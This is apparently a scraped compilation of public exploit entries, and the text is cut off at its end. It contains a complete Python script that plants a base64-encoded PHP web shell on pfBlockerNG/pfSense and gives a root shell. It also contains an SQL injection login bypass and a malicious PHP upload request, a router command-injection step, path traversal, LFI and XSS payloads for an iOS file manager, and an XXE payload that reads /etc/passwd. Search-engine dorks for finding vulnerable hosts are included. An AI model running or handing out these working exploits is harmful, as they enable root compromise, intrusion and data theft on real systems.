ISHACK AI BOT

# Exploit Title: pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE) # Shodan Results: https://www.shodan.io/search?query=http.title%3A%22pfSense+-+Login%22+%22Server%3A+nginx%22+%22Set-Cookie%3A+PHPSESSID%3D%22 # Date: 5th of September 2022 # Exploit Author: IHTeam # Vendor Homepage: https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html # Software Link: https://github.com/pfsense/FreeBSD-ports/pull/1169 # Version: 2.1.4_26 # Tested on: pfSense 2.6.0 # CVE : CVE-2022-31814 # Original Advisory: https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ #!/usr/bin/env python3 import argparse import requests import time import sys import urllib.parse from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) parser = argparse.ArgumentParser(description="pfBlockerNG <= 2.1.4_26 Unauth RCE") parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: https://192.168.1.111:443/") args = parser.parse_args() url = args.url shell_filename = "system_advanced_control.php" def check_endpoint(url): response = requests.get('%s/pfblockerng/www/index.php' % (url), verify=False) if response.status_code == 200: print("[+] pfBlockerNG is installed") else: print("\n[-] pfBlockerNG not installed") sys.exit() def upload_shell(url, shell_filename): payload = {"Host":"' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"} print("[/] Uploading shell...") response = requests.get('%s/pfblockerng/www/index.php' % (url), headers=payload, verify=False) time.sleep(2) response = requests.get('%s/system_advanced_control.php?c=id' % (url), verify=False) if ('uid=0(root) gid=0(wheel)' in str(response.content, 'utf-8')): print("[+] Upload succeeded") else: print("\n[-] Error uploading shell. Probably patched ", response.content) sys.exit() def interactive_shell(url, shell_filename, cmd): response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(cmd, safe='')), verify=False) print(str(response.text)+"\n") def delete_shell(url, shell_filename): delcmd = "rm /usr/local/www/system_advanced_control.php" response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(delcmd, safe='')), verify=False) print("\n[+] Shell deleted") check_endpoint(url) upload_shell(url, shell_filename) try: while True: cmd = input("# ") interactive_shell(url, shell_filename, cmd) except: delete_shell(url, shell_filename)

# Exploit Title: VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities # Google Dork: intext:"Wallpaper Admin" "LOGIN" "password" "Username" # Date: [18/09/2022] # Exploit Author: [Edd13Mora] # Vendor Homepage: [www.viaviweb.com] # Version: [N/A] # Tested on: [Windows 11 - Kali Linux] ------------------ SQLI on the Login page ------------------ payload --> admin' or 1=1-- - --- POC: --- [1] Disable JavaScript on ur browser put the payload and submit [2] Reactive JavaScript and resend the request --------------------------- Authenticated SQL Injection: --------------------------- Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/edit_gallery_image.php?img_id=[number] ----------------------------------------------- Remote Code Execution (RCE none authenticated): ----------------------------------------------- Poc: ---- Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/add_gallery_image.php?add=yes -------------------- Burp Request : -------------------- POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2 Host: http://googlezik.freehostia.com Cookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jdg8oraed4o52 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------33893919268150571572221367848 Content-Length: 467 Origin: http://googlezik.freehostia.com Referer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yes Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers -----------------------------33893919268150571572221367848 Content-Disposition: form-data; name="category_id" 1 -----------------------------33893919268150571572221367848 Content-Disposition: form-data; name="image[]"; filename="poc.php" Content-Type: image/png <?php phpinfo(); ?> -----------------------------33893919268150571572221367848 Content-Disposition: form-data; name="submit" -----------------------------33893919268150571572221367848-- Uploaded File can be found here : -------------------------------- http://localhost/PAth-Where-Script-Installed/categories/ ```

# Exploit Title: SoX 14.4.2 - Denial Of Service # Exploit Author: LiquidWorm Vendor: Chris Bagwell Product web page: http://sox.sourceforge.net https://en.wikipedia.org/wiki/SoX Affected version: <=14.4.2 Summary: SoX (Sound eXchange) is the Swiss Army knife of sound processing tools: it can convert sound files between many different file formats and audio devices, and can apply many sound effects and transformations, as well as doing basic analysis and providing input to more capable analysis and plotting tools. Desc: SoX suffers from a division by zero attack when handling WAV files, resulting in denial of service vulnerability and possibly loss of data. Tested on: Ubuntu 18.04.6 LTS Microsoft Windows 10 Home Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5712 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5712.php CWE ID: 369 CWE URL: https://cwe.mitre.org/data/definitions/369.html 05.09.2022 -- PoC: https://zeroscience.mk/codes/sox_div0.wav.zip --- $ ./sox div0.wav test.wav reverse Floating point exception (core dumped) ... Program received signal SIGFPE, Arithmetic exception. 0x00005555556a560d in startread (ft=ft@entry=0x5555559a54a0) at wav.c:950 (gdb) bt #0 0x00005555556a560d in startread (ft=ft@entry=0x5555559a54a0) at wav.c:950 #1 0x000055555558dcc2 in open_read (path=<optimized out>, buffer=<optimized out>, buffer_size=<optimized out>, signal=0x5555559a5140, encoding=<optimized out>, filetype=0x555555777621 "wav") at formats.c:545 #2 0x0000555555561480 in main (argc=3, argv=0x7fffffffde18) at sox.c:2945 ... Program received signal SIGFPE, Arithmetic exception. 0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457 1457 blocksWritten = MS_UNSPEC/wBlockAlign; (gdb) bt #0 0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457 #1 startwrite (ft=0x5555559a6a90) at wav.c:1252 #2 0x0000555555591669 in open_write (path=<optimized out>, buffer=buffer@entry=0x0, buffer_size=buffer_size@entry=0, buffer_ptr=buffer_ptr@entry=0x0, buffer_size_ptr=buffer_size_ptr@entry=0x0, signal=<optimized out>, encoding=<optimized out>, filetype=<optimized out>, oob=<optimized out>, overwrite_permitted=<optimized out>) at formats.c:912 #3 0x0000555555593913 in sox_open_write (path=<optimized out>, signal=<optimized out>, encoding=<optimized out>, filetype=<optimized out>, oob=<optimized out>, overwrite_permitted=<optimized out>) at formats.c:948 #4 0x000055555556b620 in open_output_file () at sox.c:1557 #5 process () at sox.c:1754 #6 main (argc=<optimized out>, argv=<optimized out>) at sox.c:3008 (gdb) bt full #0 0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457 wFormatTag = 1 dwAvgBytesPerSec = 0 dwFactSize = 4 bytespersample = <optimized out> blocksWritten = <error reading variable blocksWritten (Division by zero)> dwSamplesWritten = 0 ...

# Exploit Title: Linksys AX3200 V1.1.00 - Command Injection # Date: 2022-09-19 # Exploit Author: Ahmed Alroky # Author: Linksys # Version: 1.1.00 # Authentication Required: YES # CVE : CVE-2022-38841 # Tested on: Windows # Proof Of Concept: 1 - login into AX3200 webui 2 - go to diagnostics page 3 - put "google.com|ls" to perform a traceroute 4 - you will get the file list and also you can try "example.com|id" to ensure that all commands executed as a root user

# Exploit Title: Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities # Date: Sep 19, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.skyjos.com/ # Software Link: https://apps.apple.com/us/app/owlfiles-file-manager/id510282524 # Version: 12.0.1 # Tested on: iPhone iOS 16.0 ########### path traversal on HTTP built-in server ########### GET /../../../../../../../../../../../../../../../System/ HTTP/1.1 Host: localhost:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 If-None-Match: 42638202/1663558201/177889085 If-Modified-Since: Mon, 19 Sep 2022 03:30:01 GMT Connection: close Content-Length: 0 ------- HTTP/1.1 200 OK Cache-Control: max-age=3600, public Content-Length: 317 Content-Type: text/html; charset=utf-8 Connection: Close Server: GCDWebUploader Date: Mon, 19 Sep 2022 05:01:11 GMT <!DOCTYPE html> <html><head><meta charset="utf-8"></head><body> <ul> <li><a href="Cryptexes/">Cryptexes/</a></li> <li><a href="DriverKit/">DriverKit/</a></li> <li><a href="Library/">Library/</a></li> <li><a href="Applications/">Applications/</a></li> <li><a href="Developer/">Developer/</a></li> </ul> </body></html> ############# LFI on HTTP built-in server ############# GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1 Host: localhost:8080 Accept: application/json, text/javascript, */*; q=0.01 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 X-Requested-With: XMLHttpRequest Referer: http://localhost:8080/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ---- HTTP/1.1 200 OK Connection: Close Server: GCDWebUploader Content-Type: application/octet-stream Last-Modified: Sat, 03 Sep 2022 01:37:01 GMT Date: Mon, 19 Sep 2022 03:28:14 GMT Content-Length: 213 Cache-Control: max-age=3600, public Etag: 1152921500312187994/1662169021/0 ## # Host Database # # localhost is used to configure the loopback interface # when the system is booting. Do not change this entry. ## 127.0.0.1 localhost 255.255.255.255 broadcasthost ::1 localhost ############### path traversal on FTP built-in server ############### ftp> cd ../../../../../../../../../ 250 OK. Current directory is /../../../../../../../../../ ftp> ls 200 PORT command successful. 150 Accepted data connection total 10 drwxr-xr-x 0 root wheel 256 Jan 01 1970 usr drwxr-xr-x 0 root wheel 128 Jan 01 1970 bin drwxr-xr-x 0 root wheel 608 Jan 01 1970 sbin drwxr-xr-x 0 root wheel 224 Jan 01 1970 System drwxr-xr-x 0 root wheel 640 Jan 01 1970 Library drwxr-xr-x 0 root wheel 224 Jan 01 1970 private drwxr-xr-x 0 root wheel 1131 Jan 01 1970 dev drwxr-xr-x 0 root admin 4512 Jan 01 1970 Applications drwxr-xr-x 0 root admin 64 Jan 01 1970 Developer drwxr-xr-x 0 root admin 64 Jan 01 1970 cores WARNING! 10 bare linefeeds received in ASCII mode File may not have transferred correctly. 226 Transfer complete. ftp> ############# XSS on HTTP built-in server ############# poc 1: http://localhost:8080/download?path=<script>alert(1)</script> poc 2: http://localhost:8080/list?path=<script>alert(1)</script>

# Exploit Title: MAN-EAM-0003 V3.2.4 - XXE # Date: 2022-09-19 # Exploit Author: Ahmed Alroky # Author: http://guralp.com/ # Version: 3.2.4 # Authentication Required: NO # CVE : CVE-2022-38840 # Google dork: " webconfig menu.cgi " # Tested on: Windows # Exploit 1 - browse to http://<Host<http://%3cHost> name>/cgi-bin/xmlstatus.cgi 2 - click on "View saved XML snapshot" and upload XML exploit file or paste the exploit code and submit the form 3 - you will get /etc/passwd file content #XML exploit code ``` <?xml version='1.0'?> <!DOCTYPE replace [<!ENTITY example SYSTEM "file:///etc/passwd"> ]> <xml-status xmlns='http://www.guralp.com/platinum/xmlns/xmlstatus/1.1'> <module status='-1' display-primary='true' path='das' title='Data acquisition'> <reading status='100' display-primary='false' path='is_faulty' title='Fault condition'>false</reading> <reading status='-1' display-primary='false' path='dsp_tag' title='DSP code tag'>platinum</reading> <reading status='-1' display-primary='false' path='dsp_version' title='DSP code version'>102</reading> <reading status='100' display-primary='true' path='dsp_state' title='Acquisition hardware module'>running</reading> <reading status='-1' display-primary='true' path='reference_clock' title='Reference clock type'>GPS</reading> <reading status='100' display-primary='false' path='clock_controller' title='ADC clock controller state'>FLL</reading> <reading status='-1' display-primary='false' path='clock_control_val' title='ADC clock controller value'>46196</reading> <reading status='100' display-primary='true' path='clock_locked' title='ADC clock locked'>true</reading> <reading status='-1' display-primary='true' path='clock_last_locked' title='ADC clock last locked at'>2022-06-14T11:26:53Z</reading> <reading status='100' display-primary='true' path='clock_phase_error' units='s' title='ADC clock phase error'>6.1e-08</reading> </module> <module status='-1' display-primary='true' path='das-in.sensor.DONB..TM.0' title='Sensor A'> <reading status='100' display-primary='true' path='state' title='Current state'>running</reading> <reading status='-1' display-primary='true' path='last_action_time' title='Last action timestamp'>never</reading> <reading status='-1' display-primary='true' path='last_action' title='Last action'></reading> <reading status='96' display-primary='true' path='mass_Z' title='Z mass position'>4.6%</reading> <reading status='100' display-primary='true' path='mass_N' title='N mass position'>-0.3%</reading> <reading status='100' display-primary='true' path='mass_E' title='E mass position'>-0.3%</reading> </module> <module status='-1' display-primary='true' path='das-in.sensor.DONB..TM.1' title='Sensor B'> <reading status='100' display-primary='true' path='state' title='Current state'>running</reading> <reading status='-1' display-primary='true' path='last_action_time' title='Last action timestamp'>never</reading> <reading status='-1' display-primary='true' path='last_action' title='Last action'></reading> </module> <module status='-1' display-primary='true' path='das-in.sensor.DONB..TM.X' title='Auxiliary'> <reading status='100' display-primary='true' path='state' title='Current state'>running</reading> <reading status='-1' display-primary='true' path='last_action_time' title='Last action timestamp'>never</reading> <reading status='-1' display-primary='true' path='last_action' title='Last action'></reading> </module> <module status='-1' display-primary='true' path='gcf-out-scream.default' title='Scream server (GCF network sender)'> <reading status='100' display-primary='true' path='total_blocks' title='Total number of blocks sent'>11374055</reading> <reading status='100' display-primary='true' path='last5_blocks' title='Number of blocks sent in last 5 minutes'>331</reading> <reading status='-1' display-primary='false' path='port_number' title='Port listening on'>1567</reading> <reading status='-1' display-primary='true' path='num_clients' title='Number of clients connected'>0</reading> <list status='-1' display-primary='true' path='clients' title='Clients'> </list> </module> <module status='-1' display-primary='false' path='gdi-base.default' title='Default data transport daemon'> <reading status='100' display-primary='true' path='num_channels' title='Number of channels'>16</reading> <reading status='100' display-primary='true' path='num_clients' title='Number of connected clients'>5</reading> <reading status='100' display-primary='true' path='num_samples' title='Number of samples received'>7338920142</reading> <reading status='100' display-primary='true' path='last5_samples' title='Number of samples in last 5 minutes'>213600</reading> <list status='-1' display-primary='false' path='clients' title='Clients'> <list-item status='-1' display-primary='false' path='44B02216' title='Client #1'> <reading status='-1' display-primary='false' path='name' title='Client name'>gdi2gcf[default]</reading> </list-item> <list-item status='-1' display-primary='false' path='1CC104A5' title='Client #2'> <reading status='-1' display-primary='false' path='name' title='Client name'>gdi-link-tx[default]</reading> </list-item> <list-item status='-1' display-primary='false' path='9D9E4553' title='Client #3'> <reading status='-1' display-primary='false' path='name' title='Client name'>gdi2miniseed[default]</reading> </list-item> <list-item status='-1' display-primary='false' path='4B1427EC' title='Client #4'> <reading status='-1' display-primary='false' path='name' title='Client name'>das-in</reading> </list-item> <list-item status='-1' display-primary='false' path='412FD3EB' title='Client #5'> <reading status='-1' display-primary='false' path='name' title='Client name'>das-in-textstatus</reading> </list-item> </list> <list status='-1' display-primary='false' path='channels' title='Channels'> <list-item status='-1' display-primary='false' path='38B5E770' title='Channel #1'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.HHZ.TM.00</reading> </list-item> <list-item status='-1' display-primary='false' path='7B77F21B' title='Channel #2'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.HHN.TM.00</reading> </list-item> <list-item status='-1' display-primary='false' path='B55019F4' title='Channel #3'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.HHE.TM.00</reading> </list-item> <list-item status='-1' display-primary='false' path='35ED217B' title='Channel #4'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.HDF.TM.X0</reading> </list-item> <list-item status='-1' display-primary='false' path='8062D6AB' title='Channel #5'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.HNZ.TM.10</reading> </list-item> <list-item status='-1' display-primary='false' path='2099C9F1' title='Channel #6'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.HNN.TM.10</reading> </list-item> <list-item status='-1' display-primary='false' path='DE833721' title='Channel #7'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.HNE.TM.10</reading> </list-item> <list-item status='-1' display-primary='false' path='5510ED44' title='Channel #8'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.MMZ.TM.00</reading> </list-item> <list-item status='-1' display-primary='false' path='ACFA260E' title='Channel #9'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.MMN.TM.00</reading> </list-item> <list-item status='-1' display-primary='false' path='5BED382E' title='Channel #10'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.MME.TM.00</reading> </list-item> <list-item status='-1' display-primary='false' path='67453FF7' title='Channel #11'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.SOH.TM.0</reading> </list-item> <list-item status='-1' display-primary='false' path='1D34DF0D' title='Channel #12'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB-AIB</reading> </list-item> <list-item status='-1' display-primary='false' path='A11AEDBA' title='Channel #13'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.SOH.TM.1</reading> </list-item> <list-item status='-1' display-primary='false' path='2DBCFF6E' title='Channel #14'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB-BIB</reading> </list-item> <list-item status='-1' display-primary='false' path='9D7CDB17' title='Channel #15'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.SOH.TM.X</reading> </list-item> <list-item status='-1' display-primary='false' path=' 8A3C070' title='Channel #16'> <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB-XIB</reading> </list-item> </list> </module> <module status='-1' display-primary='true' path='gdi-link-tx.default' title='System gdi-link transmitter'> <reading status='100' display-primary='true' path='total_bytes_sent' units='bytes' title='Total number of bytes sent'>11273973132</reading> <reading status='100' display-primary='true' path='last5_bytes_sent' title='Number of bytes sent in last 5 minutes'>325518</reading> <reading status='100' display-primary='true' path='tx_rate' title='Transmit rate over last 5 minutes'>1085.06</reading> <reading status='-1' display-primary='false' path='port_number' title='Port listening on'>1565</reading> <reading status='100' display-primary='true' path='num_clients' title='Number of clients'>0</reading> <list status='-1' display-primary='true' path='clients' title='Clients'> </list> </module> <module status='-1' display-primary='true' path='gdi2gcf.default' title='GCF compressor. Default instance'> <reading status='100' display-primary='true' path='num_samples_in' title='Total number of samples in'>7439096490</reading> <reading status='100' display-primary='true' path='last5_samples_in' title='Number of samples in in last 5 minutes'>216516</reading> <reading status='100' display-primary='true' path='num_blocks_out' title='Total number of blocks out'>11374055</reading> <reading status='100' display-primary='true' path='last5_blocks_out' title='Number of blocks out in last 5 minutes'>331</reading> <list status='-1' display-primary='false' path='channels' title='Channels'> <list-item status='-1' display-primary='true' path='10D33176' title='DONB.HHZ.TM.00'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>100</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-AZ0</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:26:46.000000000Z</reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'>1</reading> </list-item> <list-item status='-1' display-primary='true' path='39355EAD' title='DONB.HHN.TM.00'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>100</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-AN0</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:26:46.000000000Z</reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'>1</reading> </list-item> <list-item status='-1' display-primary='true' path=' 380425E' title='DONB.HHE.TM.00'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>100</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-AE0</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:26:45.000000000Z</reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'>1</reading> </list-item> <list-item status='-1' display-primary='true' path='E6EAF8A3' title='DONB.HDF.TM.X0'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>100</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-XX0</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:26:35.000000000Z</reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'>1</reading> </list-item> <list-item status='-1' display-primary='true' path='45B1141C' title='DONB.HNZ.TM.10'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>100</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-BZ0</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:26:48.000000000Z</reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'>1</reading> </list-item> <list-item status='-1' display-primary='true' path=' 9951403' title='DONB.HNN.TM.10'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>100</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-BN0</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:26:42.000000000Z</reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'>1</reading> </list-item> <list-item status='-1' display-primary='true' path='3B38B4CE' title='DONB.HNE.TM.10'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>100</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-BE0</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:26:40.000000000Z</reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'>1</reading> </list-item> <list-item status='-1' display-primary='true' path='3E12CA7F' title='DONB.MMZ.TM.00'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>4</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-AM8</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:24:48.000000000Z</reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading> </list-item> <list-item status='-1' display-primary='true' path='F194038D' title='DONB.MMN.TM.00'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>4</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-AM9</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:23:47.000000000Z</reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading> </list-item> <list-item status='-1' display-primary='true' path='80F951F3' title='DONB.MME.TM.00'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>4</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-AMA</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:23:57.000000000Z</reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading> </list-item> <list-item status='-1' display-primary='true' path=' DCFFBA' title='DONB.SOH.TM.0'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>nan</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-A00</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'></reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading> </list-item> <list-item status='-1' display-primary='true' path='F2D860DE' title='DONB-AIB'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>nan</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-AIB</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'></reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading> </list-item> <list-item status='-1' display-primary='true' path='8B4D513B' title='DONB.SOH.TM.1'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>nan</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-B00</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'></reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading> </list-item> <list-item status='-1' display-primary='true' path='5CC9B084' title='DONB-BIB'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>nan</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-BIB</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'></reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading> </list-item> <list-item status='-1' display-primary='true' path='B4418B8A' title='DONB.SOH.TM.X'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>nan</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-X00</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'></reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading> </list-item> <list-item status='-1' display-primary='true' path='AB7AFF68' title='DONB-XIB'> <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>nan</reading> <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-XIB</reading> <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'></reading> <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading> <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading> <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading> </list-item> </list> </module> <module status='-1' display-primary='true' path='gdi2miniseed.default' title='Mini-SEED compressor. Default instance'> <reading status='100' display-primary='true' path='num_samples_in' title='Total number of data samples in'>6184483152</reading> <reading status='100' display-primary='true' path='last5_samples_in' title='Number of samples in last 5 minutes'>180000</reading> <reading status='100' display-primary='true' path='num_text_in' title='Total number of text samples in'>0</reading> <reading status='100' display-primary='true' path='last5_text_in' title='Number of text samples in last 5 minutes'>0</reading> <reading status='100' display-primary='true' path='num_ms_rec_out' title='Total number of Miniseed records out'>22682743</reading> <reading status='100' display-primary='true' path='last5_ms_rec_out' title='Number of Miniseed records out in last 5 minutes'>655</reading> </module> <module status='-1' display-primary='true' path='gps' title='GPS'> <reading status='100' display-primary='true' path='have_data' title='GPS data received'>true</reading> <reading status='100' display-primary='false' path='last_data' title='Last data received from GPS'>2022-06-14T11:26:53Z</reading> <reading status='100' display-primary='true' path='fix' 